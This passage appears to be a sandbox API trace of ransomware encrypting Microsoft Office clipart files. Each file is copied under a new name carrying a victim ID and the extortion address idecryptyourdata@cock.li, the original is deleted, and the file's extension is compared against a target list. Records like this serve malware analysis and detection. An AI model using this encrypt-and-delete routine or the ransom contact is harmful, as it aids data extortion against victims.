hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0064.199] GetLastError () returned 0x0 [0064.199] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xda6, lpOverlapped=0x0) returned 1 [0064.231] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xdb0, lpOverlapped=0x0) returned 1 [0064.232] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.232] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.232] SetEndOfFile (hFile=0x358) returned 1 [0064.232] CloseHandle (hObject=0x358) returned 1 [0064.233] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.233] SetEndOfFile (hFile=0x344) returned 1 [0064.234] CloseHandle (hObject=0x344) returned 1 [0064.234] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.235] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf")) returned 1 [0064.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0064.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0064.235] lstrlenW (lpString=".doc") returned 4 [0064.235] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.235] lstrlenW (lpString=".docx") returned 5 [0064.235] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.235] lstrlenW (lpString=".pdf") returned 4 [0064.235] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.235] lstrlenW (lpString=".xls") returned 4 [0064.235] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.235] lstrlenW (lpString=".xlsx") returned 5 [0064.235] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.236] lstrlenW (lpString=".ppt") returned 4 [0064.236] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0064.236] lstrlenW (lpString=".zip") returned 4 [0064.236] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.236] lstrlenW (lpString=".rar") returned 4 [0064.236] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.236] lstrlenW (lpString=".bz2") returned 4 [0064.236] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.236] lstrlenW (lpString=".7z") returned 3 [0064.236] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0064.236] lstrlenW (lpString=".dbf") returned 4 [0064.236] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0064.236] lstrlenW (lpString=".1cd") returned 4 [0064.236] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 68 [0064.236] lstrlenW (lpString=".jpg") returned 4 [0064.236] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.266] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.266] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0064.269] GetLastError () returned 0x0 [0064.269] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xf6c, lpOverlapped=0x0) returned 1 [0064.325] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xf70, lpOverlapped=0x0) returned 1 [0064.326] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.326] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.326] SetEndOfFile (hFile=0x354) returned 1 [0064.326] CloseHandle (hObject=0x354) returned 1 [0064.327] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.327] SetEndOfFile (hFile=0x370) returned 1 [0064.328] CloseHandle (hObject=0x370) returned 1 [0064.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.328] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf")) returned 1 [0064.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0064.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0064.329] lstrlenW (lpString=".doc") returned 4 [0064.329] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.329] lstrlenW (lpString=".docx") returned 5 [0064.329] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.329] lstrlenW (lpString=".pdf") returned 4 [0064.329] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.329] lstrlenW (lpString=".xls") returned 4 [0064.329] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.329] lstrlenW (lpString=".xlsx") returned 5 [0064.329] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.329] lstrlenW (lpString=".ppt") returned 4 [0064.329] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0064.329] lstrlenW (lpString=".zip") returned 4 [0064.329] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.329] lstrlenW (lpString=".rar") returned 4 [0064.329] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.329] lstrlenW (lpString=".bz2") returned 4 [0064.329] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.329] lstrlenW (lpString=".7z") returned 3 [0064.329] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0064.329] lstrlenW (lpString=".dbf") returned 4 [0064.329] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0064.329] lstrlenW (lpString=".1cd") returned 4 [0064.329] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0064.329] lstrlenW (lpString=".jpg") returned 4 [0064.330] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.340] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.340] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.340] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0064.345] GetLastError () returned 0x0 [0064.352] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x8d6, lpOverlapped=0x0) returned 1 [0064.377] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x8e0, lpOverlapped=0x0) returned 1 [0064.378] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.378] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.378] SetEndOfFile (hFile=0x340) returned 1 [0064.381] CloseHandle (hObject=0x340) returned 1 [0064.386] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.386] SetEndOfFile (hFile=0x350) returned 1 [0064.390] CloseHandle (hObject=0x350) returned 1 [0064.390] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.390] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf")) returned 1 [0064.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0064.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0064.391] lstrlenW (lpString=".doc") returned 4 [0064.391] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.391] lstrlenW (lpString=".docx") returned 5 [0064.391] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0064.391] lstrlenW (lpString=".pdf") returned 4 [0064.391] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.391] lstrlenW (lpString=".xls") returned 4 [0064.391] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.391] lstrlenW (lpString=".xlsx") returned 5 [0064.391] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0064.391] lstrlenW (lpString=".ppt") returned 4 [0064.391] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0064.391] lstrlenW (lpString=".zip") returned 4 [0064.391] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.391] lstrlenW (lpString=".rar") returned 4 [0064.391] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.391] lstrlenW (lpString=".bz2") returned 4 [0064.392] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.392] lstrlenW (lpString=".7z") returned 3 [0064.392] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0064.392] lstrlenW (lpString=".dbf") returned 4 [0064.392] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0064.392] lstrlenW (lpString=".1cd") returned 4 [0064.392] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 68 [0064.392] lstrlenW (lpString=".jpg") returned 4 [0064.392] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.398] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.398] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0064.400] GetLastError () returned 0x0 [0064.400] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xa82, lpOverlapped=0x0) returned 1 [0064.423] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xa90, lpOverlapped=0x0) returned 1 [0064.424] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.424] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.425] SetEndOfFile (hFile=0x2c8) returned 1 [0064.425] CloseHandle (hObject=0x2c8) returned 1 [0064.425] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.425] SetEndOfFile (hFile=0x370) returned 1 [0064.426] CloseHandle (hObject=0x370) returned 1 [0064.426] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.427] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf")) returned 1 [0064.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0064.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0064.427] lstrlenW (lpString=".doc") returned 4 [0064.427] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.427] lstrlenW (lpString=".docx") returned 5 [0064.427] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.427] lstrlenW (lpString=".pdf") returned 4 [0064.427] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.427] lstrlenW (lpString=".xls") returned 4 [0064.427] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.427] lstrlenW (lpString=".xlsx") returned 5 [0064.427] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.427] lstrlenW (lpString=".ppt") returned 4 [0064.427] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0064.427] lstrlenW (lpString=".zip") returned 4 [0064.427] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.427] lstrlenW (lpString=".rar") returned 4 [0064.427] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.428] lstrlenW (lpString=".bz2") returned 4 [0064.428] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.428] lstrlenW (lpString=".7z") returned 3 [0064.428] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0064.428] lstrlenW (lpString=".dbf") returned 4 [0064.428] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0064.428] lstrlenW (lpString=".1cd") returned 4 [0064.428] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0064.428] lstrlenW (lpString=".jpg") returned 4 [0064.428] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.458] SetFilePointerEx (hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0) [0064.458] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.458] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0064.465] GetLastError () returned 0x0 [0064.465] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x9c5e, lpOverlapped=0x0) returned 1 [0064.488] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x9c60, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x9c60, lpOverlapped=0x0) returned 1 [0064.489] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.489] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.490] SetEndOfFile (hFile=0x354) returned 1 [0064.490] CloseHandle (hObject=0x354) returned 1 [0064.491] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.491] SetEndOfFile (hFile=0x340) returned 1 [0064.492] CloseHandle (hObject=0x340) returned 1 [0064.493] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.493] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf")) returned 1 [0064.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0064.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0064.496] lstrlenW (lpString=".doc") returned 4 [0064.496] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.496] lstrlenW (lpString=".docx") returned 5 [0064.496] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.496] lstrlenW (lpString=".pdf") returned 4 [0064.496] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.496] lstrlenW (lpString=".xls") returned 4 [0064.496] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.496] lstrlenW (lpString=".xlsx") returned 5 [0064.496] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.496] lstrlenW (lpString=".ppt") returned 4 [0064.496] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0064.496] lstrlenW (lpString=".zip") returned 4 [0064.496] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.496] lstrlenW (lpString=".rar") returned 4 [0064.496] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.496] lstrlenW (lpString=".bz2") returned 4 [0064.496] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.497] lstrlenW (lpString=".7z") returned 3 [0064.497] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0064.497] lstrlenW (lpString=".dbf") returned 4 [0064.497] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0064.497] lstrlenW (lpString=".1cd") returned 4 [0064.497] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0064.497] lstrlenW (lpString=".jpg") returned 4 [0064.497] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.501] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.501] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0064.502] GetLastError () returned 0x0 [0064.502] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xa7f0, lpOverlapped=0x0) returned 1 [0064.541] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xa800, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xa800, lpOverlapped=0x0) returned 1 [0064.542] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.542] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.542] SetEndOfFile (hFile=0x2c8) returned 1 